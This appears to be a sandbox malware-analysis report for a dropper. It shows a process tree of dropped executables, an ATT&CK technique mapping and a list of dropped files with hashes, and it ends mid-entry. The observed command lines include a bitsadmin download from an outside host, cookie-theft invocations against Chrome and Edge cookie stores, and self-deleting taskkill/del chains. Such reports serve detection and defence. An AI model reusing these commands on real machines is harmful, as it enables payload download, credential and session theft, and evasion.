                                                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff6b37ea890,0x7ff6b37ea8a0,0x7ff6b37ea8b0
                                                                                                                    10⤵
                                                                                                                      PID:4924
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:8
                                                                                                                    9⤵
                                                                                                                      PID:6036
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2396 /prefetch:8
                                                                                                                      9⤵
                                                                                                                        PID:4120
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2312 /prefetch:2
                                                                                                                        9⤵
                                                                                                                          PID:5676
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "cmd.exe" /C taskkill /F /PID 4972 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\3mNn5CIyVPmHaKdgrjubkziy.exe"
                                                                                                                        8⤵
                                                                                                                          PID:5788
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /F /PID 4972
                                                                                                                            9⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4656
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "cmd.exe" /C taskkill /F /PID 4972 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\3mNn5CIyVPmHaKdgrjubkziy.exe"
                                                                                                                          8⤵
                                                                                                                            PID:4988
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /F /PID 4972
                                                                                                                              9⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:4556
                                                                                                                      • C:\Users\Admin\Documents\hC5bw1NYtrdTyrxYR9W3ufJl.exe
                                                                                                                        "C:\Users\Admin\Documents\hC5bw1NYtrdTyrxYR9W3ufJl.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:4940
                                                                                                                        • C:\Users\Admin\Documents\hC5bw1NYtrdTyrxYR9W3ufJl.exe
                                                                                                                          C:\Users\Admin\Documents\hC5bw1NYtrdTyrxYR9W3ufJl.exe
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3852
                                                                                                                      • C:\Users\Admin\Documents\mCFxI5IX5ERRKvvZwkNY6yLc.exe
                                                                                                                        "C:\Users\Admin\Documents\mCFxI5IX5ERRKvvZwkNY6yLc.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4928
                                                                                                                        • C:\Users\Admin\Documents\mCFxI5IX5ERRKvvZwkNY6yLc.exe
                                                                                                                          C:\Users\Admin\Documents\mCFxI5IX5ERRKvvZwkNY6yLc.exe
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5168
                                                                                                                      • C:\Users\Admin\Documents\J9WHAPo_vYQaiPdRjLYJzIOZ.exe
                                                                                                                        "C:\Users\Admin\Documents\J9WHAPo_vYQaiPdRjLYJzIOZ.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4916
                                                                                                                        • C:\Users\Admin\AppData\Roaming\2148320.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\2148320.exe"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4864
                                                                                                                        • C:\Users\Admin\AppData\Roaming\8307911.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\8307911.exe"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          PID:2172
                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5608
                                                                                                                        • C:\Users\Admin\AppData\Roaming\4268287.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\4268287.exe"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4592
                                                                                                                      • C:\Users\Admin\Documents\rdaNmJLnrsh4Ld3njPCrVOx6.exe
                                                                                                                        "C:\Users\Admin\Documents\rdaNmJLnrsh4Ld3njPCrVOx6.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:4904
                                                                                                                        • C:\Users\Admin\Documents\rdaNmJLnrsh4Ld3njPCrVOx6.exe
                                                                                                                          C:\Users\Admin\Documents\rdaNmJLnrsh4Ld3njPCrVOx6.exe
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3952
                                                                                                                      • C:\Users\Admin\Documents\vk6ix9Xn0Y1LwRrrPfG6vaQY.exe
                                                                                                                        "C:\Users\Admin\Documents\vk6ix9Xn0Y1LwRrrPfG6vaQY.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4892
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5368
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5412
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          7⤵
                                                                                                                            PID:5876
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5900
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5236
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5280
                                                                                                                        • C:\Users\Admin\Documents\ngUAOXsUl9UeOHEOzdnBliOp.exe
                                                                                                                          "C:\Users\Admin\Documents\ngUAOXsUl9UeOHEOzdnBliOp.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:5088
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im ngUAOXsUl9UeOHEOzdnBliOp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ngUAOXsUl9UeOHEOzdnBliOp.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                            7⤵
                                                                                                                              PID:6084
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /im ngUAOXsUl9UeOHEOzdnBliOp.exe /f
                                                                                                                                8⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:5144
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 6
                                                                                                                                8⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:752
                                                                                                                          • C:\Users\Admin\Documents\EF1dLyJmOP5awgGYVia3F59i.exe
                                                                                                                            "C:\Users\Admin\Documents\EF1dLyJmOP5awgGYVia3F59i.exe"
                                                                                                                            6⤵
                                                                                                                              PID:5076
                                                                                                                              • C:\Users\Admin\Documents\EF1dLyJmOP5awgGYVia3F59i.exe
                                                                                                                                C:\Users\Admin\Documents\EF1dLyJmOP5awgGYVia3F59i.exe
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4576
                                                                                                                            • C:\Users\Admin\Documents\jsbxJRrF0JEH00qgabe6A8ZD.exe
                                                                                                                              "C:\Users\Admin\Documents\jsbxJRrF0JEH00qgabe6A8ZD.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              PID:1184
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswA05A.tmp\tempfile.ps1"
                                                                                                                                7⤵
                                                                                                                                  PID:5156
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswA05A.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                    PID:5584
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswA05A.tmp\tempfile.ps1"
                                                                                                                                    7⤵
                                                                                                                                      PID:4816
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswA05A.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                        PID:5912
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswA05A.tmp\tempfile.ps1"
                                                                                                                                        7⤵
                                                                                                                                          PID:4248
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswA05A.tmp\tempfile.ps1"
                                                                                                                                          7⤵
                                                                                                                                            PID:4712
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nswA05A.tmp\tempfile.ps1"
                                                                                                                                            7⤵
                                                                                                                                              PID:5796
                                                                                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                              "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                              7⤵
                                                                                                                                              • Download via BitsAdmin
                                                                                                                                              PID:4796
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                        4⤵
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:2144
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\sonia_6.exe
                                                                                                                                          sonia_6.exe
                                                                                                                                          5⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:2116
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3940
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3796
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                            6⤵
                                                                                                                                              PID:3588
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                              6⤵
                                                                                                                                                PID:1808
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                            4⤵
                                                                                                                                              PID:744
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 532
                                                                                                                                              4⤵
                                                                                                                                              • Program crash
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2044
                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                        1⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • Modifies registry class
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:2184
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                          2⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:2556
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                          2⤵
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:4320
                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:2024
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                          2⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Modifies registry class
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:2052
                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                        1⤵
                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                        PID:5336
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          2⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:5388
                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                        1⤵
                                                                                                                                          PID:5356
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C213.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C213.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:5204
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C213.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C213.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:4704
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C699.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C699.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:4408
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\CF54.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\CF54.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:5408
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D7C1.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D7C1.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5460
                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3944
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5176
                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4256
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4876
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5284
                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5016
                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4476
                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2532
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2008

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                    Persistence

                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                    1
                                                                                                                                                                    T1031

                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                    1
                                                                                                                                                                    T1060

                                                                                                                                                                    BITS Jobs

                                                                                                                                                                    1
                                                                                                                                                                    T1197

                                                                                                                                                                    Defense Evasion

                                                                                                                                                                    Modify Registry

                                                                                                                                                                    3
                                                                                                                                                                    T1112

                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                    1
                                                                                                                                                                    T1089

                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                    1
                                                                                                                                                                    T1497

                                                                                                                                                                    BITS Jobs

                                                                                                                                                                    1
                                                                                                                                                                    T1197

                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                    1
                                                                                                                                                                    T1130

                                                                                                                                                                    Credential Access

                                                                                                                                                                    Credentials in Files

                                                                                                                                                                    3
                                                                                                                                                                    T1081

                                                                                                                                                                    Discovery

                                                                                                                                                                    Query Registry

                                                                                                                                                                    6
                                                                                                                                                                    T1012

                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                    1
                                                                                                                                                                    T1497

                                                                                                                                                                    System Information Discovery

                                                                                                                                                                    6
                                                                                                                                                                    T1082

                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                    1
                                                                                                                                                                    T1120

                                                                                                                                                                    Collection

                                                                                                                                                                    Data from Local System

                                                                                                                                                                    3
                                                                                                                                                                    T1005

                                                                                                                                                                    Command and Control

                                                                                                                                                                    Web Service

                                                                                                                                                                    1
                                                                                                                                                                    T1102

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads

                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                      MD5

                                                                                                                                                                      38b33d357b48f05e2e68d4f8a1db047a

                                                                                                                                                                      SHA1

                                                                                                                                                                      8ce535f29afb1fa588d7152fcc59f35cefc987ba

                                                                                                                                                                      SHA256

                                                                                                                                                                      74e458267a323f8bd03a94b9e476f734f925907f1d331d5faaec13dfaddd561e

                                                                                                                                                                      SHA512

                                                                                                                                                                      e92bb39c16f71a3a42457e917cbf80cf1ec04e34b14c63b5650d3d485556cbb371c81053e263ac5aaa531c7705ab375c92d85f98a9a8cff173c01905bed1ce3f

                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                      MD5

                                                                                                                                                                      5ff584af05cab237078a6630a50548fe

                                                                                                                                                                      SHA1

                                                                                                                                                                      de58d2ed9b44cd4fd89c45ea7136d0faf86a7d63

                                                                                                                                                                      SHA256

                                                                                                                                                                      a9d0645039bc6644e1f83f69c4d78cc3a9a3a55615921a0c44a8c5abd3404eac

                                                                                                                                                                      SHA512

                                                                                                                                                                      07c3dc4a07fd68ae982cffec18a8aa7ffc708b832aada915c653398aba8f61c212c64e971afa47eebb547d124e33a1d5e093c9235dfcee9386b4c43a93dcc4b6

                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                      MD5

                                                                                                                                                                      7e0c683be2a6bf4e4606430808f76d92

                                                                                                                                                                      SHA1

                                                                                                                                                                      d27a4e6afca350d153be9ab17894680448a50d47

                                                                                                                                                                      SHA256

                                                                                                                                                                      a2602d5e1321385fc9270bc5f5bdde4369b8fad73c57f7d4683e55f4dc46d4b6

                                                                                                                                                                      SHA512

                                                                                                                                                                      ff3aa54b6d65245ba7605624c738addfe3244614887b6a455de97e77ba6ecce794b8aa9f3433283bce4ff825275b22e2930722998a5cf4ab4a7ecd27f7a632c9

                                                                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                      MD5

                                                                                                                                                                      9d956a5d2fb11feb29cee5533024dbd0

                                                                                                                                                                      SHA1

                                                                                                                                                                      7500c66ad7f374873974d7826a679a0f8289afe4

                                                                                                                                                                      SHA256

                                                                                                                                                                      03a2e346f1528af5a0b3d5221f07d679b38f7e80bf694a311ef7eadab1e54b57

                                                                                                                                                                      SHA512

                                                                                                                                                                      793089da3ca00d3b583748ccae69c99da0cd352d99215afff4596fa5ac7dd5b7ab774b164e7131ef89b3b28ab4d66af770fb78097c1db437616471c2ae67e11b

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\libcurl.dll
                                                                                                                                                                      MD5

                                                                                                                                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                      SHA1

                                                                                                                                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                      SHA256

                                                                                                                                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                      SHA512

                                                                                                                                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\libcurlpp.dll
                                                                                                                                                                      MD5

                                                                                                                                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                      SHA1

                                                                                                                                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                      SHA256

                                                                                                                                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                      SHA512

                                                                                                                                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\libgcc_s_dw2-1.dll
                                                                                                                                                                      MD5

                                                                                                                                                                      9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                      SHA1

                                                                                                                                                                      64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                      SHA256

                                                                                                                                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                      SHA512

                                                                                                                                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\libstdc++-6.dll
                                                                                                                                                                      MD5

                                                                                                                                                                      5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                      SHA1

                                                                                                                                                                      8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                      SHA256

                                                                                                                                                                      97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                      SHA512

                                                                                                                                                                      666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\libwinpthread-1.dll
                                                                                                                                                                      MD5

                                                                                                                                                                      1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                      SHA1

                                                                                                                                                                      fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                      SHA256

                                                                                                                                                                      509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                      SHA512

                                                                                                                                                                      3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\setup_install.exe
                                                                                                                                                                      MD5

                                                                                                                                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                      SHA1

